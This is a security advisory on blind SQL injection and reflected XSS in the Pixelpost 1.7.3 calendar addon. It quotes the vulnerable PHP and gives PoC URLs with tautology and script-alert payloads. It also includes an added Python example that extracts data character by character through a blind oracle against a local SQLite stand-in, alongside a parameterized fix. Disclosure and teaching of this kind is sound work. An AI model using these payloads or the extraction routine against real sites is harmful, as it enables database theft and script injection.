Simone "negator" Onofri found multiple issues in a nice image gallery script that he was going to use for his personal purposes; perhaps it's better to wait a couple of releases before using it in production. Since the vendor was not responsive, this is a forced release. The vulnerabilities found include Blind SQL Injection and XSS.
Pixelpost (Calendar addon 1.1.6) 1.7.3 Multiple vulnerabilities

Name              Pixelpost (Calendar 1.1.6) 1.7.3 Multiple vulnerabilities
Systems Affected  Pixelpost v1.7.3
Severity          High
Impact            High 10/10, vector (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Vendor            http://www.pixelpost.org/
Advisory          http://www.ush.it/team/negator/hack-pixelpost_173/adv.txt
Author            Simone "negator" Onofri
Date              20110407

I. BACKGROUND

Pixelpost is an open-source, standards-compliant, multi-lingual, fully
extensible photoblog application for the web.

II. DESCRIPTION

Pixelpost "Calendar", a pretty looking image gallery written in PHP, is
vulnerable to Blind SQL Injection and XSS.

III. ANALYSIS

Summary:

 A) Blind SQL Injection (SQLI) Vulnerability
 B) Reflected Cross Site Scripting (XSS) Vulnerability

A) Blind SQL Injection (SQLI) Vulnerability

A blind SQL Injection vulnerability exists in Pixelpost version 1.7.3. The
calendar functionality must be enabled: it is an addon distributed with the
package but disabled by default.

The GET variable "category" is inserted into a SELECT query without
sanitization and without a cast to an integer type in "addon/calendar.php":

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$query2 = mysql_query("SELECT a.* FROM ".$pixelpost_db_prefix."pixelpost a, "
    .$pixelpost_db_prefix."catassoc b WHERE b.cat_id = '" . $_GET["category"]
    . "' AND a.id = b.image_id AND (a.datetime like '$prev_browsing_month_day%')
    ORDER BY a.datetime desc limit 1");
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

It's possible to exploit the issue in the standard blind way, for example
using TRUE/FALSE statements (tautology based bisection): the page only tells
the attacker whether an image was found for the injected condition, and that
single bit is enough to read arbitrary values out of the database one
character at a time.
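The bisection described above, worked through as an added example that is not part of the original advisory nor of Pixelpost's code. SQLite stands in for MySQL (so SQLite's unicode()/substr()/length() replace MySQL's ASCII()/SUBSTRING()/LENGTH()), the table prefix "pixelpost_", the month value and all table contents are constructed, and the "pixelpost_secret" table is a hypothetical stand-in for whatever an attacker would want to read. The vulnerable function keeps the query shape from addon/calendar.php; the hardened one shows the integer cast plus bound parameters that close the hole.

```python
"""Boolean-based blind SQL injection against a local stand-in for the
Pixelpost calendar query, beside the parameterized form that resists it.

Added example for this advisory, not Pixelpost code.  The database, the
table contents and the "secret" table are constructed for the demo; SQLite
replaces MySQL, so unicode()/substr()/length() stand in for MySQL's
ASCII()/SUBSTRING()/LENGTH()."""
import sqlite3

PREFIX = "pixelpost_"          # assumed value of $pixelpost_db_prefix
MONTH = "2011-04"              # stands in for $prev_browsing_month_day
# Hypothetical table holding something worth stealing; not a real Pixelpost table.
SECRET_SUBQUERY = f"SELECT value FROM {PREFIX}secret"


def make_db() -> sqlite3.Connection:
    """Constructed schema loosely modelled on the two tables the query joins."""
    conn = sqlite3.connect(":memory:")
    conn.execute(f"CREATE TABLE {PREFIX}pixelpost (id INTEGER, datetime TEXT)")
    conn.execute(f"CREATE TABLE {PREFIX}catassoc (cat_id INTEGER, image_id INTEGER)")
    conn.execute(f"CREATE TABLE {PREFIX}secret (value TEXT)")
    conn.executemany(f"INSERT INTO {PREFIX}pixelpost VALUES (?, ?)",
                     [(3, "2011-04-01 10:00:00"), (4, "2011-04-02 10:00:00")])
    conn.executemany(f"INSERT INTO {PREFIX}catassoc VALUES (?, ?)", [(10, 3), (10, 4)])
    conn.execute(f"INSERT INTO {PREFIX}secret VALUES ('s3cret')")  # constructed value
    conn.commit()
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, category: str) -> bool:
    """Same query shape as addon/calendar.php: $_GET["category"] is spliced
    into the quoted literal.  The page only reveals whether a row came back
    (an image is shown or not), which is the one bit a blind attacker reads."""
    sql = (f"SELECT a.* FROM {PREFIX}pixelpost a, {PREFIX}catassoc b "
           f"WHERE b.cat_id = '{category}' AND a.id = b.image_id "
           f"AND (a.datetime like '{MONTH}%') ORDER BY a.datetime desc limit 1")
    return conn.execute(sql).fetchone() is not None


def hardened_lookup(conn: sqlite3.Connection, category: str) -> bool:
    """Fixed form: cast to int (as the advisory suggests) and bind parameters,
    so the value can never change the statement's structure."""
    try:
        cat_id = int(category)
    except ValueError:
        return False                      # reject instead of interpolating
    sql = (f"SELECT a.* FROM {PREFIX}pixelpost a, {PREFIX}catassoc b "
           "WHERE b.cat_id = ? AND a.id = b.image_id "
           "AND (a.datetime like ?) ORDER BY a.datetime desc limit 1")
    return conn.execute(sql, (cat_id, MONTH + "%")).fetchone() is not None


def extract_blind(oracle, subquery: str, max_len: int = 64) -> str:
    """Tautology-based bisection: recover the string `subquery` yields using
    only a true/false oracle.  Every probe has the PoC shape
    10' AND <condition> AND '1'='1, so the query stays syntactically valid.
    About 7 probes per character (binary search over code points 0..127) plus
    one per position to test the length, instead of up to 128 guesses each."""
    out = []
    for pos in range(1, max_len + 1):
        if not oracle(f"' AND length(({subquery})) >= {pos} AND '1'='1"):
            break                         # past the end of the string
        lo, hi = 0, 127                   # the code point lies in [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"' AND unicode(substr(({subquery}), {pos}, 1)) > {mid} AND '1'='1"):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


def demo() -> dict:
    """Run the PoC pair, the extraction and the hardened check; return the results."""
    conn = make_db()

    def oracle(tail: str) -> bool:        # models category=10<payload> in the URL
        return vulnerable_lookup(conn, "10" + tail)

    return {
        "vuln_true": oracle("' AND '1'='1"),      # PoC 1: image shown
        "vuln_false": oracle("' AND '1'='0"),     # PoC 2: nothing shown
        "leaked": extract_blind(oracle, SECRET_SUBQUERY),
        "hardened_injected": hardened_lookup(conn, "10' AND '1'='1"),
        "hardened_legit": hardened_lookup(conn, "10"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The two PoC probes reproduce the advisory's URL pair; `extract_blind` then drives the same oracle to read the constructed secret, and the hardened lookup shows that the injected value is rejected outright while the legitimate `category=10` still works.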
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
http://www.example.com/pixelpost/index.php?curr_month=4&curr_year=2011&showimage=3&category=10'+AND+'1'='1
http://www.example.com/pixelpost/index.php?curr_month=4&curr_year=2011&showimage=3&category=10'+AND+'1'='0
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

The first URL returns the same page as the unmodified request (the injected
condition is true), the second one does not (it is false); comparing the two
responses gives the oracle needed for blind extraction.

B) Reflected Cross Site Scripting (XSS) Vulnerability

A Reflected Cross Site Scripting vulnerability exists in Pixelpost version
1.7.3 in the calendar addon, which is shipped by default but disabled. The GET
variables "curr_year" and "category" are reflected in the page without proper
encoding in "addon/calendar.php":

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$cal_vz .= "
<table class='table-calendar-vz' cellspacing='0'>
<tr>
<td class='td-calendar-navi-vz'><a href='$PHP_SELF?curr_month=$prev_month&curr_year=$prev_year&showimage=$prev_image_id$geos_cat_id'>&laquo;</a></td>
<td colspan='5' class='td-calendar-navi-vz'> $asc_mon-$curr_year </td>
<td class='td-calendar-navi-vz'><a href='$PHP_SELF?curr_month=$next_month&curr_year=$next_year&showimage=$next_image_id$geos_cat_id'>&raquo;</a></td>
</tr>
<tr>";
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Note that the reflected values land inside single-quoted HTML attributes, so
an output encoder that leaves single quotes alone (PHP's htmlspecialchars()
without ENT_QUOTES) would not be enough to close this hole.

PoC URL that exploits this vulnerability:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
http://www.example.com/pixelpost/index.php?curr_month=4&curr_year=2011'><script>alert('XSS')</script>&showimage=3&category=1'><script>alert('XSS 2')</script>
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

We did not investigate issues that may occur with register_globals on.

IV. DETECTION

Pixelpost 1.7.3 and possibly earlier versions are vulnerable.

V. WORKAROUND

No fix available.

VI. VENDOR RESPONSE

No vendor response.

VII. CVE INFORMATION

No CVE at this time.

VIII. DISCLOSURE TIMELINE

20110309 Bug discovered
20110309 Vendor contacted
20110321 Advisory release scheduled for 20110407
20110407 Advisory released

IX. REFERENCES

Well you know what a SQLi or XSS is, right?

X. CREDIT

Simone "negator" Onofri is credited for the discovery of this vulnerability.
Thanks to Francesco "ascii" Ongaro for revision and fine editing.

Simone "negator" Onofri
web site: http://simone.onofri.net/
mail: simone AT onofri DOT net

Francesco "ascii" Ongaro
web site: http://www.ush.it/
mail: ascii AT ush DOT it

XI. LEGAL NOTICES

Copyright (c) 2011 Francesco "ascii" Ongaro

Permission is granted for the redistribution of this alert electronically.
It may not be edited in any way without my express written consent. If you
wish to reprint the whole or any part of this alert in any other medium
other than electronically, please email me for permission.

Disclaimer: The information in the advisory is believed to be accurate at
the time of publishing based on currently available information. Use of the
information constitutes acceptance for use in an AS IS condition. There are
no warranties with regard to this information. Neither the author nor the
publisher accepts any liability for any direct, indirect, or consequential
loss or damage arising from use of, or reliance on, this information.